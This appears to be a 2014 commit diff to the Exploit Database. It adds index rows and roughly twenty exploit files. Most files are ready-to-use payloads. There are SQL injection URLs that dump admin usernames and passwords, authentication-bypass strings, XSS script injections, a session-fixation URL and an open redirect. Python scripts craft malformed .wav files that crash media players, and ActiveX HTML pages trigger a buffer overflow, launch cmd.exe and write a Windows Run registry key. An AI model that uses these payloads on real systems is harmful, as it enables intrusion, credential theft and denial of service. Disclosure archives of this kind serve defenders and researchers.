Updated 03_26_2014

files.csv

@@ -29217,6 +29217,7 @@ id,file,description,date,author,platform,type,port
 32449,platforms/php/webapps/32449.txt,"H-Sphere WebShell 4.3.10 'actions.php' Multiple Cross Site Scripting Vulnerabilities",2008-10-01,C1c4Tr1Z,php,webapps,0
 32450,platforms/php/webapps/32450.txt,"WikyBlog 1.7.1 Multiple Cross-Site Scripting Vulnerabilities",2008-10-01,"Omer Singer",php,webapps,0
 32451,platforms/linux/dos/32451.txt,"Fedora 8/9 Linux Kernel 'utrace_control' NULL Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Michael Simms",linux,dos,0
+32452,platforms/linux/dos/32452.txt,"Adobe Flash Player 9/10 - SWF Version Null Pointer Dereference Denial of Service Vulnerability",2008-10-02,"Matthew Dempsky",linux,dos,0
 32453,platforms/php/webapps/32453.txt,"Dreamcost HostAdmin 3.1 'index.php' Cross-Site Scripting Vulnerability",2008-10-02,Am!r,php,webapps,0
 32454,platforms/unix/dos/32454.xml,"libxml2 Denial of Service Vulnerability",2008-10-02,"Christian Weiske",unix,dos,0
 32455,platforms/php/webapps/32455.pl,"Website Directory 'index.php' Cross-Site Scripting Vulnerability",2008-10-03,"Ghost Hacker",php,webapps,0
@@ -29240,3 +29241,25 @@ id,file,description,date,author,platform,type,port
 32473,platforms/php/webapps/32473.txt,"'com_jeux' Joomla! Component 'id' Parameter SQL Injection Vulnerability",2008-10-11,H!tm@N,php,webapps,0
 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 'index.php' Cross-Site Scripting Vulnerability",2008-10-11,d3v1l,php,webapps,0
 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server <= 11.1 'CREATE ANY DIRECTORY' Privilege Escalation Vulnerability",2008-10-13,"Paul M. Wright",multiple,remote,0
+32477,platforms/windows/dos/32477.py,"Windows Media Player 11.0.5721.5230 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32478,platforms/windows/dos/32478.py,"jetVideo 8.1.1 - Basic (.wav) Local Crash PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32479,platforms/php/webapps/32479.txt,"BigDump 0.35b -  Arbitrary Upload",2014-03-24,"felipe andrian",php,webapps,0
+32481,platforms/windows/dos/32481.txt,"Light Audio Player 1.0.14 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32482,platforms/windows/dos/32482.py,"GOM Media Player (GOMMP) 2.2.56.5183 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32483,platforms/windows/dos/32483.py,"GOM Video Converter 1.1.0.60 - Memory Corruption PoC",2014-03-24,"TUNISIAN CYBER",windows,dos,0
+32485,platforms/asp/webapps/32485.txt,"ASP Indir Iltaweb Alisveris Sistemi 'xurunler.asp' SQL Injection Vulnerability",2008-10-13,tRoot,asp,webapps,0
+32486,platforms/php/webapps/32486.txt,"Webscene eCommerce 'productlist.php' SQL Injection Vulnerability",2008-10-14,"Angela Chang",php,webapps,0
+32487,platforms/php/webapps/32487.txt,"Elxis CMS 2008.1 modules/mod_language.php Multiple Parameter XSS",2008-10-14,faithlove,php,webapps,0
+32488,platforms/php/webapps/32488.txt,"Elxis CMS 2008.1 PHPSESSID Variable Session Fixation",2008-10-14,faithlove,php,webapps,0
+32489,platforms/windows/remote/32489.txt,"Microsoft Outlook Web Access for Exchange Server 2003 'redir.asp' URI Redirection Vulnerability",2008-10-15,"Martin Suess",windows,remote,0
+32490,platforms/php/webapps/32490.txt,"SweetCMS 1.5.2 'index.php' SQL Injection Vulnerability",2008-10-14,Dapirates,php,webapps,0
+32491,platforms/windows/remote/32491.html,"Hummingbird HostExplorer 6.2/8.0 ActiveX Control 'PlainTextPassword()' Buffer Overflow Vulnerability",2008-10-16,"Thomas Pollet",windows,remote,0
+32492,platforms/php/webapps/32492.txt,"Habari 0.5.1 'habari_username' Parameter Cross-Site Scripting Vulnerability",2008-10-16,faithlove,php,webapps,0
+32493,platforms/windows/remote/32493.html,"Hummingbird Deployment Wizard 10 'DeployRun.dll' ActiveX Control Multiple Security Vulnerabilities",2008-10-17,shinnai,windows,remote,0
+32494,platforms/php/webapps/32494.txt,"FlashChat 'connection.php' Role Filter Security Bypass Vulnerability",2008-10-17,eLiSiA,php,webapps,0
+32495,platforms/php/webapps/32495.txt,"Jetbox CMS 2.1 admin/cms/images.php orderby Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0
+32496,platforms/php/webapps/32496.txt,"Jetbox CMS 2.1 admin/cms/nav.php nav_id Parameter SQL Injection",2008-10-20,"Omer Singer",php,webapps,0
+32497,platforms/php/webapps/32497.txt,"PHP-Nuke Sarkilar Module 'id' Parameter SQL Injection Vulnerability",2008-10-20,r45c4l,php,webapps,0
+32498,platforms/asp/webapps/32498.txt,"Dizi Portali 'diziler.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0
+32499,platforms/php/webapps/32499.txt,"phPhotoGallery 0.92 'index.php' SQL Injection Vulnerability",2008-10-21,KnocKout,php,webapps,0
+32500,platforms/asp/webapps/32500.txt,"Bahar Download Script 2.0 'aspkat.asp' SQL Injection Vulnerability",2008-10-21,"CyberGrup Lojistik",asp,webapps,0

platforms/asp/webapps/32485.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31740/info
+
+ASP Indir Iltaweb Alisveris Sistemi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/urunler.asp?catno=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from users 

platforms/asp/webapps/32498.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31849/info
+
+Dizi Portali is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/path/diziler.asp?id=[Sql Injection] 

platforms/asp/webapps/32500.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31852/info
+
+Bahar Download Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Bahar Download Script 2.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/path/aspkat.asp?kid=-2%20union%20select%200,kullanici,parola,3,4,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20where%20id=1 

platforms/linux/dos/32452.txt

@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/31537/info
+
+Adobe Flash Player Plugin is prone to a remote denial-of-service vulnerability.
+
+Successfully exploiting this issue will allow attackers to crash the browser that uses the plugin, denying service to legitimate users.
+
+The following versions of Flash Player Plugin are vulnerable:
+
+9.0.45.0
+9.0.112.0
+9.0.124.0
+10.0.12.10
+
+UPDATE (March 11, 2009): Flash Player Plugin 10.0.22.87 is vulnerable.
+
+UPDATE (September 4, 2009): Mac OS X 10.6 reportedly ships with Flash Player 10.0.23.1, which will overwrite any installed version of Flash Player when Mac OS X is being installed.
+
+UPDATE (June 10, 2010): Flash Player 10.1.53.64 and 9.0.227.0 are available. 
+
+http://www.exploit-db.com/sploits/32452.zip

platforms/php/webapps/32479.txt

@@ -0,0 +1,14 @@
+[+] Arbitrary Upload on BigDump v0.35b
+[+] Date: 23/03/2014
+[+] Risk: High
+[+] Author: Felipe Andrian Peixoto
+[+] Vendor Homepage: http://www.ozerov.de/bigdump/
+[+] Contact: felipe_andrian@hotmail.com
+[+] Tested on: Windows 7 and Linux
+[+] Vulnerable File: bigdump.php
+[+] Version: v0.35b
+[+] Exploit : http://host/bigdump.php?start= 
+[+] PoC: http://SERVER/bigdump.php?start=
+
+Note: allows upload files and shells with tamperdate.
+

platforms/php/webapps/32486.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31755/info
+
+Webscene eCommerce is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- 

platforms/php/webapps/32487.txt

@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/31764/info
+
+Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application.
+
+Elxis CMS 2006.1 is vulnerable; other versions may also be affected.
+
+http://www.example.net/index.php?>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
+http://www.example.net/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>

platforms/php/webapps/32488.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31764/info
+ 
+Elxis CMS is prone to multiple cross-site scripting and session-fixation vulnerabilities because it fails to sufficiently sanitize user-supplied data. The application is also prone to a session-fixation vulnerability.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+Using the session-fixation issue, the attacker can hijack the session and gain unauthorized access to the affected application.
+ 
+Elxis CMS 2006.1 is vulnerable; other versions may also be affected.
+
+http://www.site.com/?PHPSESSID=[session_fixation] 

platforms/php/webapps/32490.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31774/info
+
+SweetCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SweetCMS 1.5.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- 

platforms/php/webapps/32492.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31794/info
+
+Habari is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Habari 0.5.1 is affected; other versions may be vulnerable as well.
+
+http://www.example.com/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> 

platforms/php/webapps/32494.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31800/info
+
+FlashChat is prone to a security-bypass vulnerability.
+
+An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. 
+
+sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id= 

platforms/php/webapps/32495.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31824/info
+
+Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Jetbox CMS 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admin/cms/images.php?orderby=[INJECTION POINT]

platforms/php/webapps/32496.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31824/info
+ 
+Jetbox CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+ 
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+ 
+Jetbox CMS 2.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] 

platforms/php/webapps/32497.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31830/info
+
+Sarkilar module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- 

platforms/php/webapps/32499.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31850/info
+
+phPhotoGallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+phPhotoGallery 0.92 is affected; other versions may also be vulnerable. 
+
+Username : ' or 1=1/*Password : ' or 1=1/* 

platforms/windows/dos/32477.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Windows Media Player 11.0.5721.5230 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://windows.microsoft.com/fr-FR/windows/windows-media-player
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+ 
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"#  Title: WMP 11.0.5721.5230 Memory Corruption PoC         #"
+print"#  Author: TUNISIAN CYBER                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "ms.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()

platforms/windows/dos/32478.py

@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: jetVideo 8.1.1 Basic (.wav) Local Crash PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://www.jetaudio.com/download/jetvideo.html
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+ 
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"#  Title: Light jetVideo 8.1.1 Basic (.wav) Local Crash PoC#"
+print"#  Author: TUNISIAN CYBER                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "jet.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()

platforms/windows/dos/32481.txt

@@ -0,0 +1,40 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: Light Audio Player 1.0.14 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://download.cnet.com/Light-Audio-Player/3000-2139_4-10791618.html
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+ 
+import os
+os.system("color 02")
+
+print"###########################################################"
+print"#  Title: Light Audio Player 1.0.14 Memory Corruption PoC  #"
+print"#  Author: TUNISIAN CYBER                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Files Created!\n"
+file.close()

platforms/windows/dos/32482.py

@@ -0,0 +1,39 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: GOMMP 2.2.56.5183 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://player.gomlab.com/eng/
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+ 
+
+print"###########################################################"
+print"#  Title: GOMMP 2.2.56.5183 Memory Corruption PoC          #"
+print"#  Author: TUNISIAN CYBER                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+ 
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Done!\n"
+file.close()

platforms/windows/dos/32483.py

@@ -0,0 +1,39 @@
+#!/usr/bin/python
+
+#[+] Author: TUNISIAN CYBER
+#[+] Exploit Title: GOM Video Converter 1.1.0.60 Memory Corruption PoC
+#[+] Date: 22-03-2014
+#[+] Category: DoS/PoC
+#[+] Tested on: WinXp/Windows 7 Pro
+#[+] Vendor: http://converter.gomlab.com/
+#[+] Friendly Sites: na3il.com,th3-creative.com
+#[+] Twitter: @TCYB3R
+ 
+
+print"###########################################################"
+print"#  Title: GOMVC 1.1.0.60 Memory Corruption PoC             #"
+print"#  Author: TUNISIAN CYBER                                  #"
+print"#  Category: DoS/PoC                                       # "
+print"###########################################################"
+	
+ 
+header=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
+"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
+"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
+"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
+ 
+filename = "3vil.wav"
+file = open(filename , "w")
+file.write(header)
+print "\n Done!\n"
+file.close()

platforms/windows/remote/32489.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31765/info
+
+Outlook Web Access is prone to a remote URI-redirection vulnerability because the application fails to properly sanitize user-supplied input.
+
+A successful exploit may aid in phishing attacks.
+
+OWA 6.5 SP 2 is vulnerable; other versions may also be affected. 
+
+https://webmail.example.com/exchweb/bin/redir.asp?URL=http://www.example2.com
+
+https://webmail.example.com/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttp%3A%2F%2Fwww.example2.com&reason=0 

platforms/windows/remote/32491.html

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31783/info
+
+Hummingbird HostExplorer ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions. 
+
+<html> <!-- the latest version of this activex (13.0) is compiled with /gs, earlier versions aren't. The XXXX would have overwritten return address. by thomas.pollet@gmail.com --> <object classid='clsid:FFB6CC68-702D-4FE2-A8E7-4DE23835F0D2' id='target' ></object> <script language='vbscript'> arg1="001101220123012401250126012701280129012:012;012<012=012>012?012@012A012B012C012D012E012FXXXX" target.PlainTextPassword = arg1 </script> </html> 

platforms/windows/remote/32493.html

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31799/info
+
+Hummingbird Deployment Wizard 10 ActiveX control is prone to multiple vulnerabilities that attackers can exploit to run arbitrary code. The issues stem from insecure methods used within 'DeployRun.dll'.
+
+An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page.
+
+Successfully exploiting these issues allows remote attackers to edit registry key information or execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts will likely result in denial-of-service conditions.
+
+Hummingbird Deployment Wizard 10 10.0.0.44 is vulnerable; other versions may also be affected.
+
+<object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.Run "cmd.exe", "/C calc.exe" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe 'test.SetRegistryValueAsString "Existing Registry Path + Existing Registry Key", "Value to change" test.SetRegistryValueAsString "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YourFavouriteKey", "Hello World!" End Sub </script> <object classid='clsid:7F9B30F1-5129-4F5C-A76C-CE264A6C7D10' id='test' height='20' width='20'></object> <input language=VBScript onclick=tryMe() type=button value='Click here to start the test'> <script language='vbscript'> Sub tryMe test.PerformUpdateAsync "calc.exe" End Sub </script>